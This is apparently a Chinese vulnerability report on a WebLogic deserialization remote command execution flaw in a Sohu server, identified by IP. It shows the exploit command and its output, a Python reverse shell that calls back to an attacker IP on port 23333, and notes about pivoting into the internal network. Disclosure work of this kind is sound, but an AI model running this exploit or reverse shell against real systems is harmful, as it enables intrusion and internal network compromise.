搜狐某个服务器配置不当,存在远程命令执行漏洞 可威胁内网安全
服务器 123.125.123.26 存在weblogic 反序列化漏洞,没想到搜狐也存在这样的漏洞。
python weblogic_exp.py http://123.125.123.26:8080
weblogic unserialize vul is ok 123.125.123.26:8080
WebPath: /DATA3/apps/psoft/webserv/HROUT
可以直接上传一个脚本反弹一个shell
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((” ip”,23333));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”])
先来查看一下IP,可以发现该服务器是出于内网的,所以内部信息可以直接代理访问,或者进一步的渗透
搜狐的内部安全中心
简单探测下内网。